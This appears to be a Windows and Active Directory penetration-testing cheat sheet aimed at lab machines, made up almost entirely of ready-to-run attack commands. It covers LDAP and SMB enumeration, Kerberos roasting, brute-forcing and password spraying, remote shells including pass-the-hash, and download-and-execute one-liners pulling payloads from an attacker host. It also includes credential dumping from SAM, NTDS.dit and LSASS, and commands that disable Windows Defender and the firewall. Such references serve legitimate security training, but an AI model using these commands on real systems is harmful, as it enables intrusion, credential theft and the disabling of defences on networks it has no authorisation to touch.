LDAP enumeration
$ enum4linux -a 10.10.10.180
$ smbclient -L \\10.10.10.180 -N
$ ldapsearch -x -H ldap://10.10.10.180 -b "dc=DOMAIN,dc=LOCAL"
$ python windapsearch.py -u username -p password -d DOMAIN.LOCAL --dc-ip 10.10.10.180
$ python ad-ldap-enum.py -d DOMAIN.LOCAL -l 10.10.10.180 -u username -p password
Find some useful credentials:
$ GetNPUsers.py -dc-ip 10.10.10.180 -no-pass "DOMAIN.LOCAL/username"
$ smbclient -U username -L \\10.10.10.180
Connect
$ evil-winrm -i 10.10.10.180 -u username -p password
$ psexec.py username:password@10.10.10.180
$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Username@10.10.10.180
Crack/Bruteforce
$ hashcat -m 18200 -a 0 -w 3 hashfile.hash rockyou.txt
Username brute:
$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.180 users.txt
Password brute
$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.180 rockyou.txt username123
Password spray
$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.180 users.txt Password123
(passwordspray takes a single password as the last argument, not a wordlist; a filename there would be tried literally as the password)
https://github.com/dafthack/DomainPasswordSpray
> Import-Module .\DomainPasswordSpray.ps1
> Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
Crack Tickets:
$ python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
CrackMapExec:
$ crackmapexec smb 10.10.10.180 -u '' -p ''
$ crackmapexec <protocol> 10.10.10.180
Changing Permissions of a File:
> icacls file.txt /grant Everyone:F
Downloading files
> IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
> (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")
> Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"
> certutil.exe -urlcache -split -f "http://10.10.10.180:80/shell.exe" shell.exe
Privilege Escalation:
Autologon settings:
> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Dump:
$ secretsdump.py -dc-ip 10.10.10.180 defaultUserName:defaultPassword\!@10.10.10.180
Dump SAM file:
$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
NTDS.dit dump:
$ secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
$ crackmapexec smb 10.10.10.180 -u username -p password -d DOMAIN.LOCAL --ntds drsuapi
On a DC, mimikatz can dump hashes from LSASS:
> lsadump::lsa /inject
Recon:
> systeminfo
> hostname
Especially useful for hotfix info:
> wmic qfe get Caption,Description,HotFixID,InstalledOn
What users/localgroups are on the machine?
> net users
> net localgroup
> net localgroup Administrators
> net user username
Crosscheck local and domain too
> net user username /domain
> net group Administrators /domain
Network information
> ipconfig /all
> route print
> arp -a
To see what privileges our token holds
> whoami /priv
Which groups we belong to
> whoami /groups
Recursive string scan
> findstr /spin "password" *.*
Running processes
> tasklist /SVC
Network connections
> netstat -ano
Search for writeable directories
> dir /a-r-d /s /b
Show files/dirs including hidden ones (PowerShell)
> dir -force
Windows Defender
> sc.exe config WinDefend start= disabled
> sc.exe stop WinDefend
> Set-MpPreference -DisableRealtimeMonitoring $true
Firewall
> Netsh Advfirewall show allprofiles
> NetSh Advfirewall set allprofiles state off
Useful tools/modules
Impacket : https://github.com/CoreSecurity/impacket
Pywinrm : https://github.com/diyan/pywinrm
Pywerview : https://github.com/the-useless-one/pywerview
PowerSploit : https://github.com/PowerShellMafia/PowerSploit
Invoke-Obfuscation : https://github.com/danielbohannon/Invoke-Obfuscation
Invoke-Vnc : https://github.com/artkond/Invoke-Vnc
Mimikittenz : https://github.com/putterpanda/mimikittenz
NetRipper : https://github.com/NytroRST/NetRipper
RandomPS-Scripts : https://github.com/xorrior/RandomPS-Scripts
SessionGopher : https://github.com/fireeye/SessionGopher
Mimipenguin : https://github.com/huntergregal/mimipenguin